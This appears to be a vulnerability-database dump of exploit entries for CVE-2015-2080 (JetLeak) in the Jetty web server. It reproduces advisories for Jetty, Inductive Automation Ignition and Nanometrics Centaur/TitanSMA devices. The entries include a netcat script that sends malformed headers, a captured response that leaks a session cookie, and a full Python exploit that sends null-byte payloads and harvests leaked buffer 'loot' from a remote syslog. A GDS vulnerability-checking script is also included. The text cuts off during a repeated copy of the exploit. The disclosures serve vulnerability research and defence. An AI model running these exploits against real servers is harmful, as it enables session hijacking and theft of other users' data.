https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080\r\n \r\nOriginal: http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html\r\nJetleak Test script: https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py\r\nEclipse: http://git.eclipse.org/c/jetty/org.eclipse.jetty.project.git/plain/advisories/2015-02-24-httpparser-error-buffer-bleed.md\r\n https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md\r\n \r\n \r\n14.01.2016\r\n \r\n---\r\n \r\n \r\n#######################\r\n#!/bin/bash\r\n \r\n#RESOURCEPATH=\"/main/web/config/alarming.schedule?4674-1.IBehaviorListener.0-demo\"\r\nRESOURCEPATH=\"/main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo\"\r\nBAD=$'\\a'\r\n \r\nfunction normalRequest {\r\necho \"-- Normal Request --\"\r\n \r\nnc localhost 8088 << NORMREQ\r\nPOST $RESOURCEPATH HTTP/1.1\r\nHost: localhost\r\nContent-Type: application/x-www-form-urlencoded;charset=utf-8\r\nConnection: close\r\nContent-Length: 63\r\n \r\nNORMREQ\r\n}\r\n \r\nfunction badCookie {\r\necho \"-- Bad Cookie --\"\r\n \r\nnc localhost 8088 << BADCOOKIE\r\nGET $RESOURCEPATH HTTP/1.1\r\nHost: localhost\r\nCoo${BAD}kie: ${BAD}\r\n \r\nBADCOOKIE\r\n}\r\n \r\nnormalRequest\r\necho \"\"\r\necho \"\"\r\nbadCookie\r\n \r\n#######################\r\n \r\n \r\n \r\nOriginal raw analysis request via proxy using Referer:\r\n------------------------------------------------------\r\n \r\nGET /main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo&_=1452849939485 HTTP/1.1\r\nHost: localhost:8088\r\nAccept: application/xml, text/xml, */*; q=0.01\r\nX-Requested-With: XMLHttpRequest\r\nWicket-Ajax: true\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\r\nWicket-Ajax-BaseURL: config/conf.modules?51461\r\nReferer: \\x00\r\n \r\n \r\nResponse leaking part of Cookie session:\r\n----------------------------------------\r\n \r\nHTTP/1.1 400 Illegal character 0x0 in state=HEADER_VALUE in 'GET /main/web/con...461\\r\\nReferer: \\x00<<<\\r\\nAccept-Encoding...tion: close\\r\\n\\r\\n>>>SESSIONID=15iwe0g...\\x0fCU\\xFa\\xBf\\xA4j\\x12\\x83\\xCb\\xE61~S\\xD1'\r\nContent-Length: 0\r\nConnection: close\r\nServer: Jetty(9.2.z-SNAPSHOT)\n\n# 0day.today [2018-03-31] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/25382"}], "packetstorm": [{"lastseen": "2020-02-18T06:47:25", "description": "", "published": "2020-02-17T00:00:00", "type": "packetstorm", "title": "Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2080"], "modified": "2020-02-17T00:00:00", "id": "PACKETSTORM:156387", "href": "https://packetstormsecurity.com/files/156387/Nanometrics-Centaur-TitanSMA-Unauthenticated-Remote-Memory-Leak.html", "sourceData": "`Title: Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit \nAdvisory ID: ZSL-2020-5562 \nType: Local/Remote \nImpact: System Access, DoS, Exposure of System Information, Exposure of Sensitive Information \nRisk: (5/5) \nRelease Date: 15.02.2020 \n \nSummary \n \nThe Centaur digital recorder is a portable geophysical sensing acquisition system that consists of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities. Its ease of use simplifies high performance geophysical sensing deployments in both remote and networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for infrasound and similar geophysical sensor recording applications requiring sample rates up to 5000 sps. \n \nThe TitanSMA is a strong motion accelerograph designed for high precision observational and structural engineering applications, where scientists and engineers require exceptional dynamic range over a wide frequency band. \nDescription \nAn information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224. As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage. Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent packet) which can be combined to leak sensitive data which can be used to perform session hijacking and authentication bypass scenarios. \n \nVendor \n \nNanometrics Inc. - https://www.nanometrics.ca \n \nAffected Version \n \nCentaur <= 4.3.23 \nTitanSMA <= 4.2.20 \nTested On \nJetty 9.4.z-SNAPSHOT \n \nVendor Status \n \n[10.02.2020] Vulnerabilities discovered. \n[10.02.2020] Vendor contacted. \n[14.02.2020] No response from the vendor. \n[15.02.2020] Public security advisory released. \n \nPoC \n \n#!/usr/bin/env python3 \n# \n# Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit \n# \n# \n# Vendor: Nanometrics Inc. \n# Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma \n# Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder \n# \n# Affected versions: \n# Centaur <= 4.3.23 \n# TitanSMA <= 4.2.20 \n# \n# Summary: \n# The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists \n# of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities. \n# Its ease of use simplifies high performance geophysical sensing deplayments in both remote and \n# networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for \n# infrasound and similar geophysical sensor recording applications requiring sample rates up to \n# 5000 sps. \n# \n# Summary: \n# The TitanSMA is a strong motion accelerograph designed for high precision observational and \n# structural engineering applications, where scientists and engineers require exceptional dynamic \n# range over a wide frequency band. \n# \n# Description: \n# An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect \n# critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) \n# suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224. \n# As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage. \n# Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP \n# packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system \n# logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent \n# packet) which can be combined to leak sensitive data which can be used to perform session hijacking \n# and authentication bypass scenarios. \n# \n# Tested on: \n# Jetty 9.4.z-SNAPSHOT \n# \n# Vulnerability discovered by: \n# byteGoblin @ zeroscience.mk \n# \n# \n# Advisory ID: ZSL-2020-5562 \n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php \n# \n# Related CVE: CVE-2015-2080 \n# Related CWE: CWE-532, CWE-538 \n# \n# 10.02.2020 \n# \n \nimport requests \nimport re \nimport sys \n \nclass Goblin: \ndef __init__(self): \nself.host = None \nself.page = \"/zsl\" \nself.syslog = \"/logs/syslog\" \nself.buffer_pad = \"A\" * 70 \nself.buffer = None \nself.payload = \"\\xFF\" \nself.payloads_to_send = 70 # 70 seems to be a good number before we get weird results \nself.body = {} \nself.headers = None \nself.syslog_data = {} \nself.last_line = None \nself.before_last_line = True \n \ndef banner(self): \ngoblin = \"\"\" \nNN \nNkllON \n0;;::k000XN KxllokN \n0;,:,;;;;:ldK Kdccc::oK \nNx,';codddl:::dkdc:c:;lON \nklc:clloooooooc,.':lc;'lX \nx;:ooololccllc:,:ll:,:xX \nKd:cllc'..';:ccclc,.x _ . ___ _ . \nNOoc::c:,'';:ccllc::''k \\ ___ , . _/_ ___ .' \\ __. \\ ___ | ` , __ \nNklc:clccc;.;odoollc:',xN |/ \\ | ` | .' ` | .' \\ |/ \\ | | |' `. \n0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | | \n0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \\__/ `.___, `.___| `._.' `___,' /\\__ / / | \nNc'clc;..,,,:::c:;;;,'..:oddoc;c0 \\___/ \nNl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed// \nXxclkXk;'::,,,''';:::;'''...'',:o0 \nKl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: byteGoblin \nO,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin <at> zeroscience.mk \nKdcccccdl'';;..'::;;,,,;:::;,'..;:.;K \nd;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. - nanometrics.ca \nOddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA \nd...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20 \n0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK \n0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A \n0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php \n:,;okxdc,..,,..lK Xkol;:x0kl;;::;':0 \nx:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product \nXx:,'':xk:..,''lK Y k;';;';xX \nXOkkko'.....'O d.';;,,:xN \n0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._ \nXOkkkkkON \n\"\"\" \nprint(goblin) \n \ndef generate_payload(self, amount_of_bytes): \nself.payload += \"\\x00\" * amount_of_bytes \nself.headers = {\"Cookie\": self.buffer_pad, \"Referer\": self.payload} \n \ndef read_syslog(self, initial=False): \n# Read syslog remotely and filter out 'HeapByteBuffer' messages. \n# 'initial' is used to make a 'snapshot' of the state before we send payloads... \n# That way we can filter on what we've just sent. \nprint(\"[!] - Grabbing syslog from: {}{}\".format(self.host, self.syslog)) \nbuffer = \"\" \nr = requests.get(self.host + self.syslog) \nif r.status_code == 200: \nprint(\"[!] - We got syslog, it is: {} bytes\".format(len(r.content))) \nsplit = r.text.split(\"\\n\") \nfor line in split: \nif \"HeapByteBuffer\" in line: \nif initial: \nself.last_line = line \nelse: \nif line == self.last_line: \nself.before_last_line = False \nif not self.before_last_line: \nbuffer_addr = re.search(\"\\@\\w+\", line).group(0).strip(\"@\") \ntry: \nleak = re.search(\">>>.+(?=\\.\\.\\.)\", line).group(0).strip(\">>>\") \nbuffer += leak \nexcept Exception as e: \nprint(e) \nif initial: \nreturn self.last_line \nself.buffer = buffer \nelse: # we can't access syslog? \nprint(\"[!!!] - Yoooo... we can't access syslog? Make sure you can access it, dawg...\") \nprint(\"[!!!] - The status code we got was: {}\".format(r.status_code)) \nexit(-1) \n \ndef show_output(self): \n# we need to translate '\\r\\n' into actual newlines \nif self.buffer is not None and self.buffer is not \"\": \nself.buffer = self.buffer.replace(\"\\\\n\", \"\\n\") \nself.buffer = self.buffer.replace(\"\\\\r\", \"\\r\") \nself.buffer = self.buffer.replace(\"%2f\", \"/\") \n \nprint(\"[*] BUFFER LENGTH: {}\".format(len(self.buffer))) \nprint(\"=\" * 50) \nprint(\"[*] THIS IS THE LOOT\") \nprint(\"=\" * 50) \nfor num, x in enumerate(self.buffer.split(\"\\n\")): \nprint(\"{}.\\t| \\t{}\".format(num, x)) \n \ndef send_payload(self, amount): \nprint(\"[!] - Sending payloads to target: {}{}\".format(self.host, self.page)) \nif amount > self.payloads_to_send or amount < 0: \namount = self.payloads_to_send \nfor num, x in enumerate(range(0, amount)): \nif num % 10 == 0: \nprint(\"[!] - [{}/{}] payloads sent...\".format(num, amount)) \ntry: \nself.generate_payload(17) \nr = requests.post(self.host + self.page, data=self.body, headers=self.headers) \nexcept Exception as e: \nprint(e) \nprint(\"[!] - [{}/{}] payloads sent...\".format(amount, amount)) \n \ndef parse_sys_args(self): \nif len(sys.argv) >= 2: \nself.host = sys.argv[1] \nif not \"http\" in self.host: \nself.host = \"http://{}\".format(self.host) \nif len(sys.argv) == 3: \n# amount of packets to send \nself.payloads_to_send = sys.argv[2] \nelse: \nself.print_help() \n \ndef print_help(self): \nprint(\"Usage: {} <ip_addr[:port]> [amount of payloads to send]\".format(sys.argv[0])) \nprint(\"Example: centaur3.py 123.456.789.0:8080 200\") \nprint(\"\\tThis will send 200 payloads to the aforementioned host\") \nprint(\"\\tThe [port] and [amount of payloads] are optional\") \nexit(-1) \n \ndef main(self): \nself.parse_sys_args() \nself.banner() \nll = self.read_syslog(initial=True) \nself.send_payload(70) \nself.read_syslog() \nself.show_output() \n \nif __name__ == '__main__': \nGoblin().main() \n \nCredits \n \nVulnerability discovered by byteGoblin - <bytegoblin@zeroscience.mk> \n \nReferences \n \n[1] https://nvd.nist.gov/vuln/detail/CVE-2015-2080 \n[2] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php \n \nChangelog \n \n[15.02.2020] - Initial release \n \nContact \n \nZero Science Lab \n \nWeb: http://www.zeroscience.mk \ne-mail: lab@zeroscience.mk \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/156387/ZSL-2020-5562.txt"}, {"lastseen": "2016-12-05T22:17:20", "description": "", "published": "2015-02-27T00:00:00", "type": "packetstorm", "title": "Jetty 9.2.8 Shared Buffer Leakage", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2080"], "modified": "2015-02-27T00:00:00", "id": "PACKETSTORM:130567", "href": "https://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html", "sourceData": "`GDS LABS ALERT: CVE-2015-2080 \nJetLeak Vulnerability Remote Leakage Of Shared Buffers In Jetty Web Server \n \nSYNOPSIS \n======== \nGotham Digital Science discovered a critical information leakage vulnerability in the Jetty web server that allows an unauthenticated remote attacker to read arbitrary data from previous requests and responses submitted to the server by other users. \n \nThe vulnerability was made public by the Jetty development team on the 24th of February 2015 and included proof-of-concept exploit code. As a result, GDS Labs recommends upgrading Jetty web server to a version patched against this vulnerability as soon as possible. \n \n \nIMPACT \n====== \nUsing a vulnerable version of the Jetty web server can lead to the compromise of sensitive data including data passed within headers (e.g. cookies, authentication tokens, etc.), as well as data passed in the POST body (e.g. usernames, passwords, authentication tokens, CSRF tokens, PII, etc.) of requests and responses handled by the web server. \n \nThe root cause of this vulnerability can be traced to exception handling code that returns approximately 16 bytes of data from a shared buffer when illegal characters are submitted in header values to the server. An attacker can exploit this behavior by submitting carefully crafted requests containing variable length strings of illegal characters to trigger the exception and offset into the shared buffer. Since the shared buffer contains user submitted data from previous requests, the Jetty server will return specific data chunks from a previous exchange depending on the attacker\u0092s payload offset. \n \n \nARE YOU VULNERABLE? \n=================== \nThis vulnerability affects versions 9.2.3 to 9.2.8. GDS also found that beta releases (including the beta releases of 9.3.x) are vulnerable. \n \nGDS have created a simple python script that can be used to determine if a Jetty HTTP server is vulnerable. The script code can be downloaded from the GDS Github repository below: \n \n- https://github.com/GDSSecurity/Jetleak-Testing-Script \n \nIf running one of the vulnerable Jetty web server versions, Jetty recommends that you upgrade to version 9.2.9.v20150224 immediately. Organizations should also be aware that Jetty might be bundled within third party products. GDS recommends referring to the Jetty Powered website (http://eclipse.org/jetty/powered/) for a non-exhaustive list of products that utilize Jetty. Due to Jetty being a fairly lightweight HTTP server, it is also commonly used by a variety of embedded systems. Organizations should contact any vendors that may be running a Jetty web server in order to determine if their products are vulnerable and when any patches to resolve this vulnerability will be made available. \n \nWe have encountered cases where development teams use Jetty as a light-weight replacement for app servers such as Tomcat for internal testing. Organizations should consider notifying their development teams about the vulnerability and require teams to upgrade any vulnerable versions of Jetty. \n \nThe latest release of the Jetty HTTP server is available for download at the following locations: \n \n- Maven - http://central.maven.org/ \n- Jetty Downloads - http://download.eclipse.org/jetty \n \n \nREFERENCES \n========== \nA thorough technical analysis of the vulnerability is available on the GDS blog at: \n \nhttp://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html \n \nJetty Vulnerability Announcement: \n \nhttp://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html \n \nJetty Vulnerability Advisory: \n \nhttps://github.com/eclipse/jetty.project/blob/master/advisories/2015-02-24-httpparser-error-buffer-bleed.md \n \n \nDISCLOSURE TIMELINE \n=================== \nFeb 19, 2015 - Vulnerability report sent to security@eclipse.org using SendSafely \n \nFeb 23, 2015 - Jetty team downloads the vulnerability report \n \nFeb 24, 2015 - Jetty team releases HTTP Server v9.2.9.v20150224 with bug fix and publicly discloses vulnerability with exploit code \n \nFeb 25, 2015 - GDS publicly discloses vulnerability \n \n \nGDS commends the Jetty development team on their timely response and swift remediation. It should be noted that the decision to publicly disclose the vulnerability was made by the Jetty development team, independent of GDS. GDS\u0092 blog post and vulnerability disclosure was published after it was discovered that Jetty had publicly disclosed the vulnerability. \n \n \nCREDITS \n======= \nStephen Komal from Gotham Digital Science for discovering the bug. \n \n \nAbout GDS Labs \n============== \n \nSecurity Research & Development is a core focus and competitive advantage for GDS. The GDS Labs team has the following primary directives: \n \n- Assessing cutting-edge technology stacks \n \n- Improving delivery efficiency through custom tool development \n \n- Finding & responsibly disclosing vulnerabilities in high value targets \n \n- Assessing the impact to our clients of high risk, publicly disclosed vulnerabilities \n \nThe GDS Labs R&D team performs security research, with areas of current focus including mobile application security, embedded systems, and cryptography. GDS also participates in many security related organizations and groups. GDS Labs is a value added service that our clients benefit from on virtually every engagement that we perform. \n \n \nAbout Gotham Digital Science \n======================= \n \nGotham Digital Science (GDS) is a specialist security consulting company focused on helping our clients find, fix, and prevent security bugs in mission critical network infrastructure, web-based software applications, mobile apps and embedded systems. GDS is also committed to contributing to the security and developer communities through sharing knowledge and resources such as blog posts, security tool releases, vulnerability disclosures, sponsoring and presenting at various industry conferences. \n \nFor more information on GDS, please contact info@gdssecurity.com or visit http://www.gdssecurity.com. \n \n \n----------------------------------- \njetleak_tester.py proof of concept: \n \nimport httplib, urllib, ssl, string, sys, getopt \nfrom urlparse import urlparse \n \n''' \n \nAuthor: Gotham Digital Science \n \nPurpose: This tool is intended to provide a quick-and-dirty way for organizations to test whether \ntheir Jetty web server versions are vulnerable to JetLeak. Currently, this script does \nnot handle sites with invalid SSL certs. This will be fixed in a future iteration. \n \n''' \n \nif len(sys.argv) < 3: \nprint(\"Usage: jetleak.py [url] [port]\") \nsys.exit(1) \n \nurl = urlparse(sys.argv[1]) \nif url.scheme == '' and url.netloc == '': \nprint(\"Error: Invalid URL Entered.\") \nsys.exit(1) \n \nport = sys.argv[2] \n \nconn = None \n \nif url.scheme == \"https\": \nconn = httplib.HTTPSConnection(url.netloc + \":\" + port) \nelif url.scheme == \"http\": \nconn = httplib.HTTPConnection(url.netloc + \":\" + port) \nelse: \nprint(\"Error: Only 'http' or 'https' URL Schemes Supported\") \nsys.exit(1) \n \nx = \"\\x00\" \nheaders = {\"Referer\": x} \nconn.request(\"POST\", \"/\", \"\", headers) \nr1 = conn.getresponse() \n \nif (r1.status == 400 and (\"Illegal character 0x0 in state\" in r1.reason)): \nprint(\"\\r\\nThis version of Jetty is VULNERABLE to JetLeak!\") \nelse: \nprint(\"\\r\\nThis version of Jetty is NOT vulnerable to JetLeak.\") \n`\n", "cvss": {"score": 3.9, "vector": "AV:NETWORK/AC:LOW/Au:UNKNOWN/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/130567/jetty-disclose.txt"}, {"lastseen": "2016-12-05T22:14:17", "description": "", "published": "2016-02-17T00:00:00", "type": "packetstorm", "title": "Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2080"], "modified": "2016-02-17T00:00:00", "id": "PACKETSTORM:135804", "href": "https://packetstormsecurity.com/files/135804/Inductive-Automation-Ignition-7.8.1-Remote-Leakage-Of-Shared-Buffers.html", "sourceData": "` \nInductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers \n \n \nVendor: Inductive Automation \nProduct web page: http://www.inductiveautomation.com \nAffected version: 7.8.1 (b2016012216) and 7.8.0 (b2015101414) \nPlatform: Java \n \nSummary: Ignition is a powerful industrial application platform with \nfully integrated development tools for building SCADA, MES, and IIoT \nsolutions. \n \nDesc: Remote unauthenticated atackers are able to read arbitrary data \nfrom other HTTP sessions because Ignition uses a vulnerable Jetty server. \nWhen the Jetty web server receives a HTTP request, the below code is used \nto parse through the HTTP headers and their associated values. The server \nbegins by looping through each character for a given header value and checks \nthe following: \n \n- On Line 1164, the server checks if the character is printable ASCII or \nnot a valid ASCII character. \n- On Line 1172, the server checks if the character is a space or tab. \n- On Line 1175, the server checks if the character is a line feed. \n- If the character is non-printable ASCII (or less than 0x20), then all \nof the checks above are skipped over and the code throws an \u0091IllegalCharacter\u0092 \nexception on line 1186, passing in the illegal character and a shared buffer. \n \n \n--------------------------------------------------------------------------- \nFile: jetty-http\\src\\main\\java\\org\\eclipse\\jetty\\http\\HttpParser.java \n--------------------------------------------------------------------------- \n920: protected boolean parseHeaders(ByteBuffer buffer) \n921: { \n[..snip..] \n1163: case HEADER_VALUE: \n1164: if (ch>HttpTokens.SPACE || ch<0) \n1165: { \n1166: _string.append((char)(0xff&ch)); \n1167: _length=_string.length(); \n1168: setState(State.HEADER_IN_VALUE); \n1169: break; \n1170: } \n1171: \n1172: if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB) \n1173: break; \n1174: \n1175: if (ch==HttpTokens.LINE_FEED) \n1176: { \n1177: if (_length > 0) \n1178: { \n1179: _value=null; \n1180: _valueString=(_valueString==null)?takeString():(_valueString+\" \"+takeString()); \n1181: } \n1182: setState(State.HEADER); \n1183: break; \n1184: } \n1185: \n1186: throw new IllegalCharacter(ch,buffer); \n--------------------------------------------------------------------------- \n \n \nTested on: Microsoft Windows 7 Professional SP1 (EN) \nMicrosoft Windows 7 Ultimate SP1 (EN) \nUbuntu Linux 14.04 \nMac OS X \nHP-UX Itanium \nJetty(9.2.z-SNAPSHOT) \nJava/1.8.0_73 \nJava/1.8.0_66 \n \n \nVulnerability discovered by Gjoko 'LiquidWorm' Krstic \n@zeroscience \n \n \nAdvisory ID: ZSL-2016-5306 \nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php \n \nCVE: CVE-2015-2080 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080 \n \nOriginal: http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html \nJetleak Test script: https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py \nEclipse: http://git.eclipse.org/c/jetty/org.eclipse.jetty.project.git/plain/advisories/2015-02-24-httpparser-error-buffer-bleed.md \nhttps://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md \n \n \n14.01.2016 \n \n--- \n \n \n####################### \n#!/bin/bash \n \n#RESOURCEPATH=\"/main/web/config/alarming.schedule?4674-1.IBehaviorListener.0-demo\" \nRESOURCEPATH=\"/main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo\" \nBAD=$'\\a' \n \nfunction normalRequest { \necho \"-- Normal Request --\" \n \nnc localhost 8088 << NORMREQ \nPOST $RESOURCEPATH HTTP/1.1 \nHost: localhost \nContent-Type: application/x-www-form-urlencoded;charset=utf-8 \nConnection: close \nContent-Length: 63 \n \nNORMREQ \n} \n \nfunction badCookie { \necho \"-- Bad Cookie --\" \n \nnc localhost 8088 << BADCOOKIE \nGET $RESOURCEPATH HTTP/1.1 \nHost: localhost \nCoo${BAD}kie: ${BAD} \n \nBADCOOKIE \n} \n \nnormalRequest \necho \"\" \necho \"\" \nbadCookie \n \n####################### \n \n \n \nOriginal raw analysis request via proxy using Referer: \n------------------------------------------------------ \n \nGET /main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo&_=1452849939485 HTTP/1.1 \nHost: localhost:8088 \nAccept: application/xml, text/xml, */*; q=0.01 \nX-Requested-With: XMLHttpRequest \nWicket-Ajax: true \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36 \nWicket-Ajax-BaseURL: config/conf.modules?51461 \nReferer: \\x00 \n \n \nResponse leaking part of Cookie session: \n---------------------------------------- \n \nHTTP/1.1 400 Illegal character 0x0 in state=HEADER_VALUE in 'GET /main/web/con...461\\r\\nReferer: \\x00<<<\\r\\nAccept-Encoding...tion: close\\r\\n\\r\\n>>>SESSIONID=15iwe0g...\\x0fCU\\xFa\\xBf\\xA4j\\x12\\x83\\xCb\\xE61~S\\xD1' \nContent-Length: 0 \nConnection: close \nServer: Jetty(9.2.z-SNAPSHOT) \n \n`\n", "cvss": {"score": 3.9, "vector": "AV:NETWORK/AC:LOW/Au:UNKNOWN/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/135804/ZSL-2016-5306.txt"}, {"lastseen": "2020-02-20T07:06:03", "description": "", "published": "2020-02-19T00:00:00", "type": "packetstorm", "title": "Nanometrics Centaur 4.3.23 Memory Leak", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2080"], "modified": "2020-02-19T00:00:00", "id": "PACKETSTORM:156414", "href": "https://packetstormsecurity.com/files/156414/Nanometrics-Centaur-4.3.23-Memory-Leak.html", "sourceData": "`# Exploit Title: Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak \n# Date: 2020-02-15 \n# Author: byteGoblin \n# Vendor: https://www.nanometrics.ca \n# Product: https://www.nanometrics.ca/products/accelerometers/titan-sma \n# Product: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder \n# CVE: N/A \n# \n# Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit \n# \n# \n# Vendor: Nanometrics Inc. \n# Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma \n# Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder \n# \n# Affected versions: \n# Centaur <= 4.3.23 \n# TitanSMA <= 4.2.20 \n# \n# Summary: \n# The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists \n# of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities. \n# Its ease of use simplifies high performance geophysical sensing deplayments in both remote and \n# networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for \n# infrasound and similar geophysical sensor recording applications requiring sample rates up to \n# 5000 sps. \n# \n# Summary: \n# The TitanSMA is a strong motion accelerograph designed for high precision observational and \n# structural engineering applications, where scientists and engineers require exceptional dynamic \n# range over a wide frequency band. \n# \n# Description: \n# An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect \n# critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) \n# suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224. \n# As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage. \n# Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP \n# packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system \n# logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent \n# packet) which can be combined to leak sensitive data which can be used to perform session hijacking \n# and authentication bypass scenarios. \n# \n# Tested on: \n# Jetty 9.4.z-SNAPSHOT \n# \n# Vulnerability discovered by: \n# byteGoblin @ zeroscience.mk \n# \n# \n# Advisory ID: ZSL-2020-5562 \n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php \n# \n# Related CVE: CVE-2015-2080 \n# Related CWE: CWE-532, CWE-538 \n# \n# 10.02.2020 \n# \n \n#!/usr/bin/env python3 \n \nimport requests \nimport re \nimport sys \n \nclass Goblin: \ndef __init__(self): \nself.host = None \nself.page = \"/zsl\" \nself.syslog = \"/logs/syslog\" \nself.buffer_pad = \"A\" * 70 \nself.buffer = None \nself.payload = \"\\xFF\" \nself.payloads_to_send = 70 # 70 seems to be a good number before we get weird results \nself.body = {} \nself.headers = None \nself.syslog_data = {} \nself.last_line = None \nself.before_last_line = True \n \ndef banner(self): \ngoblin = \"\"\" \nNN \nNkllON \n0;;::k000XN KxllokN \n0;,:,;;;;:ldK Kdccc::oK \nNx,';codddl:::dkdc:c:;lON \nklc:clloooooooc,.':lc;'lX \nx;:ooololccllc:,:ll:,:xX \nKd:cllc'..';:ccclc,.x _ . ___ _ . \nNOoc::c:,'';:ccllc::''k \\ ___ , . _/_ ___ .' \\ __. \\ ___ | ` , __ \nNklc:clccc;.;odoollc:',xN |/ \\ | ` | .' ` | .' \\ |/ \\ | | |' `. \n0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | | \n0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \\__/ `.___, `.___| `._.' `___,' /\\__ / / | \nNc'clc;..,,,:::c:;;;,'..:oddoc;c0 \\___/ \nNl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed// \nXxclkXk;'::,,,''';:::;'''...'',:o0 \nKl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: 